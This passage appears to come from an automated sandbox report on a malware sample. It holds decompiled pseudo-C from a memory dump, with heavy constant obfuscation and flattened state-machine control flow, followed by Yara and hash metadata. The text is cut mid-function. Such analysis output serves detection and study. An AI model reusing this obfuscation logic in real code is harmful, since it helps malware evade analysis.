                                              				_t373 = 0;
                                              				_t340 = 5;
                                              				 *(_t382 + 0x88) =  *(_t382 + 0x74) / _t340;
                                              				 *(_t382 + 0x88) =  *(_t382 + 0x88) ^ 0x40001189;
                                              				_t376 = 0x1f5a6ea2;
                                              				 *(_t382 + 0x68) = 0xf929;
                                              				 *(_t382 + 0x68) =  *(_t382 + 0x68) ^ 0xb70a9a6f;
                                              				 *(_t382 + 0x68) =  *(_t382 + 0x68) ^ 0xb70a6fd1;
                                              				 *(_t382 + 0x74) = 0x8254;
                                              				 *(_t382 + 0x74) =  *(_t382 + 0x74) << 2;
                                              				 *(_t382 + 0x74) =  *(_t382 + 0x74) ^ 0x00022a5c;
                                              				 *(_t382 + 0x48) = 0x274c;
                                              				_t341 = 0x4c;
                                              				 *(_t382 + 0x48) =  *(_t382 + 0x48) * 0x48;
                                              				 *(_t382 + 0x48) =  *(_t382 + 0x48) ^ 0x4b411b57;
                                              				 *(_t382 + 0x48) =  *(_t382 + 0x48) ^ 0x4b4a2351;
                                              				 *(_t382 + 0x7c) = 0x6684;
                                              				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) + 0xaed9;
                                              				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) ^ 0x00014ccf;
                                              				 *(_t382 + 0x40) = 0x1902;
                                              				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0x72d0747c;
                                              				 *(_t382 + 0x40) =  *(_t382 + 0x40) / _t341;
                                              				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0x01828d69;
                                              				 *(_t382 + 0x6c) = 0xb89b;
                                              				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) + 0xffffd32a;
                                              				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) ^ 0x0000fcd5;
                                              				 *(_t382 + 0x14) = 0x3892;
                                              				 *(_t382 + 0x14) =  *(_t382 + 0x14) >> 0xa;
                                              				 *(_t382 + 0x14) =  *(_t382 + 0x14) ^ 0x2d57d543;
                                              				 *(_t382 + 0x14) =  *(_t382 + 0x14) + 0x6cb7;
                                              				 *(_t382 + 0x14) =  *(_t382 + 0x14) ^ 0x2d585a45;
                                              				 *(_t382 + 0x28) = 0xad3d;
                                              				 *(_t382 + 0x28) =  *(_t382 + 0x28) + 0xffffae8b;
                                              				 *(_t382 + 0x28) =  *(_t382 + 0x28) >> 2;
                                              				 *(_t382 + 0x28) =  *(_t382 + 0x28) << 7;
                                              				 *(_t382 + 0x28) =  *(_t382 + 0x28) ^ 0x000b51d9;
                                              				 *(_t382 + 0x58) = 0xde2;
                                              				_t342 = 0x39;
                                              				 *(_t382 + 0x54) =  *(_t382 + 0x58) * 0x34;
                                              				 *(_t382 + 0x54) =  *(_t382 + 0x54) / _t342;
                                              				 *(_t382 + 0x54) =  *(_t382 + 0x54) ^ 0x00000d30;
                                              				 *(_t382 + 0x1c) = 0xba82;
                                              				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) << 4;
                                              				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) >> 0xc;
                                              				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) ^ 0xd59b4b7c;
                                              				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) ^ 0xd59b12fd;
                                              				 *(_t382 + 0x40) = 0xa3d9;
                                              				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0xd82378ca;
                                              				 *(_t382 + 0x40) =  *(_t382 + 0x40) + 0xffff3c17;
                                              				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0xd8236a86;
                                              				 *(_t382 + 0x5c) = 0xecab;
                                              				 *(_t382 + 0x5c) =  *(_t382 + 0x5c) >> 0x10;
                                              				 *(_t382 + 0x5c) =  *(_t382 + 0x5c) ^ 0x7d98124e;
                                              				 *(_t382 + 0x5c) =  *(_t382 + 0x5c) ^ 0x7d9832d2;
                                              				 *(_t382 + 0x80) = 0x1387;
                                              				_t343 = 0x2a;
                                              				 *(_t382 + 0x80) =  *(_t382 + 0x80) * 0x63;
                                              				 *(_t382 + 0x80) =  *(_t382 + 0x80) ^ 0x0007c428;
                                              				 *(_t382 + 0x4c) = 0x7ada;
                                              				 *(_t382 + 0x4c) =  *(_t382 + 0x4c) * 0x39;
                                              				 *(_t382 + 0x4c) =  *(_t382 + 0x4c) + 0xffffefa5;
                                              				 *(_t382 + 0x4c) =  *(_t382 + 0x4c) ^ 0x001b3452;
                                              				 *(_t382 + 0x90) = 0x1591;
                                              				 *(_t382 + 0x90) =  *(_t382 + 0x90) >> 8;
                                              				 *(_t382 + 0x90) =  *(_t382 + 0x90) ^ 0x0000431e;
                                              				 *(_t382 + 0x2c) = 0x3f89;
                                              				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) << 5;
                                              				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) | 0xff33b819;
                                              				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) << 7;
                                              				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) ^ 0x9bfcb078;
                                              				 *(_t382 + 0x98) = 0x7441;
                                              				 *(_t382 + 0x98) =  *(_t382 + 0x98) / _t343;
                                              				 *(_t382 + 0x98) =  *(_t382 + 0x98) ^ 0x000035d7;
                                              				 *(_t382 + 0x48) = 0x7f1e;
                                              				 *(_t382 + 0x48) =  *(_t382 + 0x48) + 0x7f31;
                                              				 *(_t382 + 0x48) =  *(_t382 + 0x48) << 0xe;
                                              				 *(_t382 + 0x48) =  *(_t382 + 0x48) ^ 0x3f939bef;
                                              				 *(_t382 + 0x8c) = 0x831c;
                                              				 *(_t382 + 0x8c) =  *(_t382 + 0x8c) << 8;
                                              				 *(_t382 + 0x8c) =  *(_t382 + 0x8c) ^ 0x008363dd;
                                              				 *(_t382 + 0x30) = 0x92b6;
                                              				 *(_t382 + 0x30) =  *(_t382 + 0x30) + 0xa4c2;
                                              				 *(_t382 + 0x30) =  *(_t382 + 0x30) << 0xc;
                                              				 *(_t382 + 0x30) =  *(_t382 + 0x30) << 8;
                                              				 *(_t382 + 0x30) =  *(_t382 + 0x30) ^ 0x77802bdf;
                                              				 *(_t382 + 0x28) = 0x1d89;
                                              				 *(_t382 + 0x28) =  *(_t382 + 0x28) | 0xf9709c7c;
                                              				 *(_t382 + 0x28) =  *(_t382 + 0x28) * 0x25;
                                              				 *(_t382 + 0x28) =  *(_t382 + 0x28) | 0x703957df;
                                              				 *(_t382 + 0x28) =  *(_t382 + 0x28) ^ 0x7d7fbb45;
                                              				 *(_t382 + 0x58) = 0x126d;
                                              				 *(_t382 + 0x58) =  *(_t382 + 0x58) >> 3;
                                              				 *(_t382 + 0x58) =  *(_t382 + 0x58) >> 9;
                                              				 *(_t382 + 0x58) =  *(_t382 + 0x58) ^ 0x000002d5;
                                              				 *(_t382 + 0x7c) = 0x1a69;
                                              				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) | 0x10216cf6;
                                              				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) ^ 0x102141be;
                                              				 *(_t382 + 0x20) = 0xff0b;
                                              				 *(_t382 + 0x20) =  *(_t382 + 0x20) >> 0x10;
                                              				 *(_t382 + 0x20) =  *(_t382 + 0x20) << 7;
                                              				 *(_t382 + 0x20) =  *(_t382 + 0x20) * 0x21;
                                              				 *(_t382 + 0x20) =  *(_t382 + 0x20) ^ 0x000040df;
                                              				 *(_t382 + 0x6c) = 0xe12c;
                                              				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) + 0x79cf;
                                              				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) ^ 0x000152eb;
                                              				 *(_t382 + 0x34) = 0xd574;
                                              				 *(_t382 + 0x34) =  *(_t382 + 0x34) | 0x9559dde1;
                                              				 *(_t382 + 0x34) =  *(_t382 + 0x34) ^ 0x4f646285;
                                              				 *(_t382 + 0x34) =  *(_t382 + 0x34) + 0xffff68ed;
                                              				 *(_t382 + 0x34) =  *(_t382 + 0x34) ^ 0xda3d1e7a;
                                              				 *(_t382 + 0x88) = 0x5832;
                                              				 *(_t382 + 0x88) =  *(_t382 + 0x88) * 0x27;
                                              				 *(_t382 + 0x88) =  *(_t382 + 0x88) ^ 0x000d0611;
                                              				 *(_t382 + 0x50) = 0x55a1;
                                              				 *(_t382 + 0x50) =  *(_t382 + 0x50) << 0xf;
                                              				 *(_t382 + 0x50) =  *(_t382 + 0x50) ^ 0x45d5d069;
                                              				 *(_t382 + 0x50) =  *(_t382 + 0x50) ^ 0x6f0533ce;
                                              				 *(_t382 + 0x14) = 0xc073;
                                              				 *(_t382 + 0x14) =  *(_t382 + 0x14) + 0xffffd37e;
                                              				 *(_t382 + 0x14) =  *(_t382 + 0x14) << 3;
                                              				 *(_t382 + 0x14) =  *(_t382 + 0x14) << 4;
                                              				 *(_t382 + 0x14) =  *(_t382 + 0x14) ^ 0x0049a7c7;
                                              				 *(_t382 + 0x94) = 0xf1be;
                                              				_t337 =  *((intOrPtr*)(_t382 + 0xa0));
                                              				_t344 = 0xa;
                                              				 *(_t382 + 0x94) =  *(_t382 + 0x94) / _t344;
                                              				 *(_t382 + 0x94) =  *(_t382 + 0x94) ^ 0x00002403;
                                              				 *(_t382 + 0x60) = 0x96ef;
                                              				 *(_t382 + 0x60) =  *(_t382 + 0x60) + 0xfa48;
                                              				 *(_t382 + 0x60) =  *(_t382 + 0x60) | 0xbd3809b4;
                                              				 *(_t382 + 0x60) =  *(_t382 + 0x60) ^ 0xbd39967f;
                                              				 *(_t382 + 0x38) = 0xec0c;
                                              				 *(_t382 + 0x38) =  *(_t382 + 0x38) + 0x6908;
                                              				 *(_t382 + 0x38) =  *(_t382 + 0x38) * 0x26;
                                              				 *(_t382 + 0x38) =  *(_t382 + 0x38) >> 9;
                                              				 *(_t382 + 0x38) =  *(_t382 + 0x38) ^ 0x00001f14;
                                              				do {
                                              					while(_t376 != 0x3ac0a14) {
                                              						if(_t376 == 0x7fec1df) {
                                              							_t344 = _t382 + 0x2ac;
                                              							E00230D33(_t382 + 0x2ac,  *(_t382 + 0x48), __eflags,  *((intOrPtr*)(_t382 + 0x70)),  *(_t382 + 0x14),  *((intOrPtr*)(_t382 + 0x24)));
                                              							_t382 = _t382 + 0xc;
                                              							_t376 = 0x12c07630;
                                              							continue;
                                              						} else {
                                              							if(_t376 == 0x12c07630) {
                                              								_push( *(_t382 + 0x1c));
                                              								E002229E3(_t382 + 0x2b0, 0x104, E0023889D( *((intOrPtr*)(_t382 + 0x4b8)),  *(_t382 + 0x58), __eflags),  *(_t382 + 0x5c),  *(_t382 + 0x74),  *(_t382 + 0x94),  *((intOrPtr*)(_t382 + 0xac)),  *((intOrPtr*)(_t382 + 0x4c4)),  *(_t382 + 0x54),  *(_t382 + 0x94));
                                              								_t344 =  *(_t382 + 0x5c);
                                              								E00232025( *(_t382 + 0x5c), _t327,  *((intOrPtr*)(_t382 + 0xc4)),  *((intOrPtr*)(_t382 + 0x70)));
                                              								_t382 = _t382 + 0x30;
                                              								_t376 = 0x3ac0a14;
                                              								continue;
                                              							} else {
                                              								if(_t376 == 0x1f5a6ea2) {
                                              									_t376 = 0x2b635c32;
                                              									continue;
                                              								} else {
                                              									if(_t376 == 0x2b635c32) {
                                              										E00233E3F(_t344, _t382 + 0xa4, __eflags,  *(_t382 + 0x68),  *((intOrPtr*)(_t382 + 0x70)));
                                              										_t331 = E002228CE(_t382 + 0xac,  *(_t382 + 0x50),  *(_t382 + 0x80));
                                              										_t382 = _t382 + 0xc;
                                              										_t376 = 0x7fec1df;
                                              										_t344 = 0;
                                              										 *_t331 = 0;
                                              										continue;
                                              									} else {
                                              										if(_t376 == 0x2c9ad714) {
                                              											E00234F7D( *(_t382 + 0x60),  *(_t382 + 0x38), _t337);
                                              										} else {
                                              											if(_t376 != 0x33ecfade) {
                                              												goto L16;
                                              											} else {
                                              												_t263 = _t380 + 4; // 0xedb0bf04
                                              												E00236CAA( *(_t382 + 0x4c),  *((intOrPtr*)(_t382 + 0xa0)), _t337, _t263,  *(_t382 + 0x64),  *_t380,  *(_t382 + 0x20), _t344,  *_t263,  *(_t382 + 0x94));
                                              												_t382 = _t382 + 0x20;
                                              												_t344 = 1;
                                              												_t376 = 0x2c9ad714;
                                              												_t373 =  !=  ? 1 : _t373;
                                              												continue;
                                              											}
                                              										}
                                              									}
                                              								}
                                              							}
                                              						}
                                              						L19:
                                              						return _t373;
                                              					}
                                              					_t325 = E0022B566(_t344, 0,  *((intOrPtr*)(_t382 + 0xb8)),  *(_t382 + 0x58),  *((intOrPtr*)(_t382 + 0xa8)),  *(_t382 + 0x48), _t344,  *((intOrPtr*)(_t382 + 0x70)),  *(_t382 + 0x90),  *((intOrPtr*)(_t382 + 0x84)),  *(_t382 + 0x2c),  *(_t382 + 0x74),  *(_t382 + 0x1c),  *((intOrPtr*)(_t382 + 0x4b8)));
                                              					_t337 = _t325;
                                              					_t382 = _t382 + 0x30;
                                              					__eflags = _t325 - 0xffffffff;
                                              					if(__eflags == 0) {
                                              						_t376 = 0x18af80d5;
                                              						goto L16;
                                              					} else {
                                              						_t376 = 0x33ecfade;
                                              						continue;
                                              					}
                                              					goto L19;
                                              					L16:
                                              					__eflags = _t376 - 0x18af80d5;
                                              				} while (__eflags != 0);
                                              				goto L19;
                                              			}













                                              0x00228d43
                                              0x00228d4b
                                              0x00228d53
                                              0x00228d5b
                                              0x00228d68
                                              0x00228d6c
                                              0x00228d71
                                              0x00228d79
                                              0x00228d79
                                              0x00228d8b
                                              0x00228ecd
                                              0x00228ee0
                                              0x00228ee5
                                              0x00228ee8
                                              0x00000000
                                              0x00228d91
                                              0x00228d97
                                              0x00228e4f
                                              0x00228ea1
                                              0x00228eb3
                                              0x00228eb7
                                              0x00228ebc
                                              0x00228ebf
                                              0x00000000
                                              0x00228d9d
                                              0x00228da3
                                              0x00228e45
                                              0x00000000
                                              0x00228da9
                                              0x00228daf
                                              0x00228e17
                                              0x00228e2e
                                              0x00228e33
                                              0x00228e36
                                              0x00228e3b
                                              0x00228e3d
                                              0x00000000
                                              0x00228db1
                                              0x00228db7
                                              0x00228f65
                                              0x00228dbd
                                              0x00228dc3
                                              0x00000000
                                              0x00228dc9
                                              0x00228dd0
                                              0x00228dee
                                              0x00228df5
                                              0x00228df8
                                              0x00228df9
                                              0x00228e00
                                              0x00000000
                                              0x00228e00
                                              0x00228dc3
                                              0x00228db7
                                              0x00228daf
                                              0x00228da3
                                              0x00228d97
                                              0x00228f6b
                                              0x00228f77
                                              0x00228f77
                                              0x00228f30
                                              0x00228f35
                                              0x00228f37
                                              0x00228f3a
                                              0x00228f3d
                                              0x00228f49
                                              0x00000000
                                              0x00228f3f
                                              0x00228f3f
                                              0x00000000
                                              0x00228f3f
                                              0x00000000
                                              0x00228f4e
                                              0x00228f4e
                                              0x00228f4e
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID: ,$0$2X$2\c+$2\c+$At$EZX-$Q#JK$Ui=
                                              • API String ID: 2962429428-1096774584
                                              • Opcode ID: c6f97d9852e594908297d7dc3ae08885571f18f7e498a7c9f787d4f134a9b738
                                              • Instruction ID: 990e25a2b94fe9099948742218b015bc079ccd235c86dfc2a16d034981ec9433
                                              • Opcode Fuzzy Hash: c6f97d9852e594908297d7dc3ae08885571f18f7e498a7c9f787d4f134a9b738
                                              • Instruction Fuzzy Hash: 71F11072508380AFD368CF65D48A64BFBE1BBC4758F10891DF1DA962A0C7B98959CF43
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 96%
                                              			E002326F5(intOrPtr __ecx, intOrPtr* __edx) {
                                              				intOrPtr _v4;
                                              				intOrPtr _v8;
                                              				intOrPtr _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				signed int _v36;
                                              				signed int _v40;
                                              				signed int _v44;
                                              				signed int _v48;
                                              				signed int _v52;
                                              				signed int _v56;
                                              				signed int _v60;
                                              				signed int _v64;
                                              				signed int _v68;
                                              				signed int _v72;
                                              				signed int _v76;
                                              				signed int _v80;
                                              				signed int _v84;
                                              				signed int _v88;
                                              				void* __edi;
                                              				void* __ebp;
                                              				intOrPtr _t199;
                                              				intOrPtr _t201;
                                              				void* _t202;
                                              				intOrPtr _t204;
                                              				intOrPtr _t208;
                                              				intOrPtr _t209;
                                              				intOrPtr* _t210;
                                              				signed int _t212;
                                              				signed int _t213;
                                              				signed int _t214;
                                              				signed int _t215;
                                              				void* _t216;
                                              				void* _t224;
                                              				void* _t237;
                                              				intOrPtr _t241;
                                              				void* _t242;
                                              				intOrPtr _t246;
                                              				signed int* _t247;
                                              
                                              				_t247 =  &_v88;
                                              				_v12 = 0x29be25;
                                              				_v8 = 0x714c58;
                                              				_t241 = 0;
                                              				_t210 = __edx;
                                              				_v4 = 0;
                                              				_v28 = 0x1199;
                                              				_t246 = __ecx;
                                              				_v28 = _v28 + 0xffffe920;
                                              				_t242 = 0x2efb68f6;
                                              				_v28 = _v28 ^ 0xffffad72;
                                              				_v32 = 0x5bb2;
                                              				_t212 = 0x22;
                                              				_v32 = _v32 / _t212;
                                              				_v32 = _v32 ^ 0x00002aec;
                                              				_v56 = 0xeb34;
                                              				_t213 = 0x1b;
                                              				_v56 = _v56 * 0x6a;
                                              				_v56 = _v56 + 0x2965;
                                              				_v56 = _v56 ^ 0x0061feda;
                                              				_v84 = 0xfe4e;
                                              				_v84 = _v84 + 0xd2a6;
                                              				_v84 = _v84 >> 3;
                                              				_v84 = _v84 | 0x3d0bc2c6;
                                              				_v84 = _v84 ^ 0x3d0bc81e;
                                              				_v20 = 0x5db0;
                                              				_v20 = _v20 + 0xffffd438;
                                              				_v20 = _v20 ^ 0x00005602;
                                              				_v24 = 0xa932;
                                              				_v24 = _v24 * 0x1f;
                                              				_v24 = _v24 ^ 0x00145068;
                                              				_v88 = 0xc29f;
                                              				_v88 = _v88 * 0x34;
                                              				_v88 = _v88 ^ 0xcbbf1de0;
                                              				_v88 = _v88 + 0x67bb;
                                              				_v88 = _v88 ^ 0xcb98f8b4;
                                              				_v36 = 0x7c84;
                                              				_v36 = _v36 + 0x6da7;
                                              				_v36 = _v36 ^ 0x0000df84;
                                              				_v60 = 0xf0d8;
                                              				_v60 = _v60 + 0xffffcb07;
                                              				_v60 = _v60 * 0x50;
                                              				_v60 = _v60 ^ 0x003a95e0;
                                              				_v44 = 0x6681;
                                              				_v44 = _v44 + 0xffff19d2;
                                              				_v44 = _v44 / _t213;
                                              				_v44 = _v44 ^ 0x097b3a7d;
                                              				_v16 = 0x94d;
                                              				_v16 = _v16 + 0x4187;
                                              				_v16 = _v16 ^ 0x00007836;
                                              				_v48 = 0x21e9;
                                              				_v48 = _v48 ^ 0x3c92a0ae;
                                              				_v48 = _v48 + 0xf596;
                                              				_v48 = _v48 ^ 0x3c9366ad;
                                              				_v52 = 0x4a04;
                                              				_v52 = _v52 * 0x54;
                                              				_v52 = _v52 ^ 0x56a39f58;
                                              				_v52 = _v52 ^ 0x56bbe121;
                                              				_v80 = 0x166f;
                                              				_v80 = _v80 ^ 0x3bc38db2;
                                              				_v80 = _v80 << 0xd;
                                              				_v80 = _v80 | 0x5d8ccce3;
                                              				_v80 = _v80 ^ 0x7fffd756;
                                              				_v76 = 0xd2e;
                                              				_t214 = 6;
                                              				_v76 = _v76 / _t214;
                                              				_t215 = 0x59;
                                              				_t237 = 0xdd7d922;
                                              				_v76 = _v76 / _t215;
                                              				_v76 = _v76 ^ 0xb1a59fe6;
                                              				_v76 = _v76 ^ 0xb1a5c97b;
                                              				_v40 = 0x2ae1;
                                              				_v40 = _v40 >> 6;
                                              				_v40 = _v40 << 2;
                                              				_v40 = _v40 ^ 0x0000341b;
                                              				_v64 = 0x37cd;
                                              				_v64 = _v64 + 0xffff3540;
                                              				_v64 = _v64 << 1;
                                              				_v64 = _v64 | 0x66261fef;
                                              				_v64 = _v64 ^ 0xfffeb931;
                                              				_v68 = 0x9ed9;
                                              				_v68 = _v68 + 0xad09;
                                              				_v68 = _v68 ^ 0xfd9e5c2b;
                                              				_v68 = _v68 >> 4;
                                              				_v68 = _v68 ^ 0x0fd99075;
                                              				_v72 = 0x1a2d;
                                              				_v72 = _v72 + 0xc4a4;
                                              				_v72 = _v72 << 6;
                                              				_v72 = _v72 * 0x59;
                                              				_v72 = _v72 ^ 0x135ddffd;
                                              				while(1) {
                                              					L1:
                                              					_t216 = 0x2c1c6573;
                                              					while(_t242 != 0x6072d1c) {
                                              						if(_t242 == _t237) {
                                              							_push(_t216);
                                              							_t199 = E00221132(_v44, _t216, _v16, _t216, _t241, _v48, _v52, _v80, E00222A30);
                                              							_t247 =  &(_t247[9]);
                                              							 *((intOrPtr*)(_t241 + 0x1c)) = _t199;
                                              							__eflags = _t199;
                                              							_t216 = 0x2c1c6573;
                                              							_t242 =  !=  ? 0x2c1c6573 : 0x6072d1c;
                                              							L13:
                                              							_t237 = 0xdd7d922;
                                              							continue;
                                              						}
                                              						if(_t242 == 0xe9e2879) {
                                              							_push(_v24);
                                              							_t201 = E00236DB9( *((intOrPtr*)(_t210 + 4)), _t241, _t246, __eflags, _t216,  *_t210, _v84, _v20);
                                              							_t247 =  &(_t247[5]);
                                              							 *((intOrPtr*)(_t241 + 0x28)) = _t201;
                                              							__eflags = _t201;
                                              							_t202 = 0x303a6ade;
                                              							_t242 =  !=  ? 0x303a6ade : 0x28cfd81a;
                                              							L12:
                                              							_t216 = 0x2c1c6573;
                                              							goto L13;
                                              						}
                                              						if(_t242 == 0x28cfd81a) {
                                              							return E0022F536(_v64, _v68, _v72, _t241);
                                              						}
                                              						if(_t242 == _t216) {
                                              							 *((intOrPtr*)(_t241 + 0x24)) = _t246;
                                              							_t204 =  *0x23ca24; // 0x0
                                              							 *((intOrPtr*)(_t241 + 0x2c)) = _t204;
                                              							 *0x23ca24 = _t241;
                                              							return _t204;
                                              						}
                                              						if(_t242 != 0x2efb68f6) {
                                              							if(_t242 != _t202) {
                                              								L17:
                                              								__eflags = _t242 - 0x35b12720;
                                              								if(__eflags != 0) {
                                              									continue;
                                              								} else {
                                              									return _t202;
                                              								}
                                              								L22:
                                              							} else {
                                              								_t209 = E002276DB( *((intOrPtr*)(_t241 + 0x28)), _v88, _v36, _v60);
                                              								_t247 =  &(_t247[2]);
                                              								 *((intOrPtr*)(_t241 + 4)) = _t209;
                                              								_t237 = 0xdd7d922;
                                              								_t242 =  !=  ? 0xdd7d922 : 0x6072d1c;
                                              								goto L1;
                                              							}
                                              						}
                                              						_push(_t216);
                                              						_push(_t216);
                                              						_t224 = 0x38;
                                              						_t208 = E00228736(_t224);
                                              						_t241 = _t208;
                                              						__eflags = _t241;
                                              						if(__eflags != 0) {
                                              							_t242 = 0xe9e2879;
                                              							_t202 = 0x303a6ade;
                                              							goto L12;
                                              						}
                                              						return _t208;
                                              						goto L22;
                                              					}
                                              					E0023422C(_v76,  *((intOrPtr*)(_t241 + 0x28)), _v40);
                                              					_t242 = 0x28cfd81a;
                                              					_t216 = 0x2c1c6573;
                                              					_t237 = 0xdd7d922;
                                              					goto L17;
                                              				}
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: .$4$6x$XLq$e)$}:{$!$*$*
                                              • API String ID: 0-323616845
                                              • Opcode ID: 46a11bebf5d066b33cc2e68f885bfc987622104c7137910244a097001621dfc9
                                              • Instruction ID: 9d45987b0601f01fb8b88f3c850f81e38fdc2d759f5177c9dce1c138322b91b8
                                              • Opcode Fuzzy Hash: 46a11bebf5d066b33cc2e68f885bfc987622104c7137910244a097001621dfc9
                                              • Instruction Fuzzy Hash: CCA152B1918341DFD368CF25D88950BFBE1FB84758F108A1DF199AA260D3B5CA59CF82
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002363C1() {
                                              				intOrPtr _v4;
                                              				intOrPtr _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				signed int _v36;
                                              				signed int _v40;
                                              				signed int _v44;
                                              				signed int _v48;
                                              				signed int _v52;
                                              				signed int _v56;
                                              				signed int _v60;
                                              				signed int _v64;
                                              				signed int _v68;
                                              				signed int _v72;
                                              				signed int _v76;
                                              				void* _t166;
                                              				signed int _t167;
                                              				signed int _t168;
                                              				void* _t173;
                                              				void* _t191;
                                              				intOrPtr _t196;
                                              				signed int _t197;
                                              				signed int _t198;
                                              				signed int _t199;
                                              				signed int _t200;
                                              				signed int _t201;
                                              				intOrPtr _t202;
                                              				intOrPtr* _t203;
                                              				signed int _t204;
                                              				signed int* _t205;
                                              
                                              				_t205 =  &_v76;
                                              				_v8 = 0x6b5f41;
                                              				_t196 = 0;
                                              				_t173 = 0x1e312b00;
                                              				_v4 = 0;
                                              				_v40 = 0xbf50;
                                              				_v40 = _v40 + 0xffff4d7d;
                                              				_v40 = _v40 ^ 0x1ff0eb0a;
                                              				_v40 = _v40 ^ 0x1ff1e7c7;
                                              				_v68 = 0xcba5;
                                              				_v68 = _v68 + 0xffffed4d;
                                              				_v68 = _v68 >> 9;
                                              				_v68 = _v68 | 0x05a9bf19;
                                              				_v68 = _v68 ^ 0x05a9faf6;
                                              				_v52 = 0xab70;
                                              				_v52 = _v52 + 0xffff3c3f;
                                              				_v52 = _v52 ^ 0x3be47de3;
                                              				_v52 = _v52 ^ 0xc41b8c81;
                                              				_v20 = 0x4c56;
                                              				_t27 =  &_v20; // 0x4c56
                                              				_t197 = 0x53;
                                              				_v20 =  *_t27 / _t197;
                                              				_v20 = _v20 ^ 0x00006ba4;
                                              				_v44 = 0x4e4f;
                                              				_v44 = _v44 + 0xffff1389;
                                              				_v44 = _v44 ^ 0x6e1bb2f9;
                                              				_v44 = _v44 ^ 0x91e4a702;
                                              				_v48 = 0x9b6d;
                                              				_t198 = 0x15;
                                              				_v48 = _v48 / _t198;
                                              				_v48 = _v48 << 0xe;
                                              				_v48 = _v48 ^ 0x01d9d03e;
                                              				_v16 = 0x7c52;
                                              				_t199 = 0x3a;
                                              				_v16 = _v16 * 0x14;
                                              				_v16 = _v16 ^ 0x0009e5e2;
                                              				_v64 = 0x462a;
                                              				_v64 = _v64 ^ 0x0e1a4a8f;
                                              				_v64 = _v64 >> 3;
                                              				_v64 = _v64 >> 0xc;
                                              				_v64 = _v64 ^ 0x000014fb;
                                              				_v72 = 0x5cc4;
                                              				_v72 = _v72 / _t199;
                                              				_v72 = _v72 + 0x2f24;
                                              				_v72 = _v72 + 0xd2bc;
                                              				_v72 = _v72 ^ 0x000179b4;
                                              				_v24 = 0x30ff;
                                              				_t200 = 0x2a;
                                              				_v24 = _v24 / _t200;
                                              				_v24 = _v24 ^ 0x00007cf0;
                                              				_v28 = 0x85cd;
                                              				_v28 = _v28 ^ 0xf8a4d4b8;
                                              				_v28 = _v28 ^ 0xf8a43927;
                                              				_v76 = 0x1878;
                                              				_v76 = _v76 ^ 0x7099aca3;
                                              				_v76 = _v76 ^ 0x4acb853d;
                                              				_v76 = _v76 + 0xffff4ab7;
                                              				_v76 = _v76 ^ 0x3a511503;
                                              				_v32 = 0x1800;
                                              				_v32 = _v32 << 1;
                                              				_v32 = _v32 ^ 0x00002132;
                                              				_v60 = 0xa25b;
                                              				_v60 = _v60 * 0x67;
                                              				_v60 = _v60 + 0x9ac4;
                                              				_v60 = _v60 ^ 0x004180d5;
                                              				_v36 = 0x47a4;
                                              				_v36 = _v36 << 9;
                                              				_v36 = _v36 ^ 0xcd228633;
                                              				_v36 = _v36 ^ 0xcdadbf4b;
                                              				_v12 = 0xe30d;
                                              				_v12 = _v12 << 8;
                                              				_v12 = _v12 ^ 0x00e3661f;
                                              				_t172 = _v12;
                                              				_t204 = _v12;
                                              				_t201 = _v12;
                                              				_v56 = 0x2740;
                                              				_v56 = _v56 ^ 0x239771de;
                                              				_v56 = _v56 + 0xfffffe7e;
                                              				_v56 = _v56 ^ 0x23985523;
                                              				while(1) {
                                              					L1:
                                              					_t191 = 0x5c;
                                              					while(1) {
                                              						L2:
                                              						do {
                                              							L3:
                                              							while(_t173 != 0x3fc1d7) {
                                              								if(_t173 == 0x353ab5a) {
                                              									_t202 =  *0x23ca2c; // 0x4d8300
                                              									_t203 = _t202 + 0x230;
                                              									while( *_t203 != _t191) {
                                              										_t203 = _t203 + 2;
                                              									}
                                              									_t201 = _t203 + 2;
                                              									_t173 = 0x6fcf9e2;
                                              									goto L2;
                                              								} else {
                                              									if(_t173 == 0x6adc8a5) {
                                              										_t167 = E0022F65F(_v40, _v44, _v48, _v16, _t201, _t172, _v64);
                                              										_t205 =  &(_t205[5]);
                                              										_t204 = _t167;
                                              										_t166 = 0xd265085;
                                              										_t173 =  !=  ? 0xd265085 : 0x3fc1d7;
                                              										_t191 = 0x5c;
                                              										continue;
                                              									} else {
                                              										if(_t173 == 0x6fcf9e2) {
                                              											_t168 = E00222959(_t173, _v68, _v52, _v20, _v56);
                                              											_t172 = _t168;
                                              											_t205 =  &(_t205[4]);
